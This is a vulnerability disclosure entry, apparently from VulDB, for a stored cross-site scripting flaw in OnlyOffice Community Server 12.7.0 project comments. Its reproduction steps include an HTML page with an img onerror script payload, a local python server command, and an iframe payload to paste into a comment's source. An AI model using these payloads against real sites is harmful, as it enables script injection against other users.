| 제목 | Ascensio System SIA OnlyOffice Community Server 12.7.0 Cross Site Scripting |
|---|
| 설명 | Description
In OnlyOffice, users can create projects and add comments. While HTML input is permitted, it also allows embedding iframe that can contain JavaScript, leading to an XSS vulnerability. The XSS doesn't directly affect OnlyOffice, instead JavaScript from any malicious site can be loaded to OnlyOffice through iframe tags.
Credits: 0xHamy & Luke Smith
Reproduce
Create index.html with the following content:
<!DOCTYPE html> <html> <head> <title>Malicious Page</title> </head> <body> <h1>Welcome to Evil Site</h1> <img/src=x onerror=alert('xss')> </body> </html>
Serve index.html with python http server:
python3 -m http.server
Create a comment under a project of your choice on OnlyOffice:
http://127.0.0.1:8088/Products/Projects/Messages.aspx?prjID=1&id=1#comments
Edit source code of the comment and use the following payload:
<iframe src="http://127.0.0.1:8000/index.html"></iframe>
Reload or spread the page and the content will load. |
|---|
| 원천 | ⚠️ https://hkohi.ca/vulnerability/21 |
|---|
| 사용자 | 0xHamy (UID 88518) |
|---|
| 제출 | 2025. 08. 16. AM 05:23 (8 개월 ago) |
|---|
| 모더레이션 | 2025. 09. 11. AM 07:42 (26 days later) |
|---|
| 상태 | 수락 |
|---|
| VulDB 항목 | 323615 [Ascensio System SIA OnlyOffice 까지 12.7.0 Comment Messages.aspx 크로스 사이트 스크립팅] |
|---|
| 포인트들 | 20 |
|---|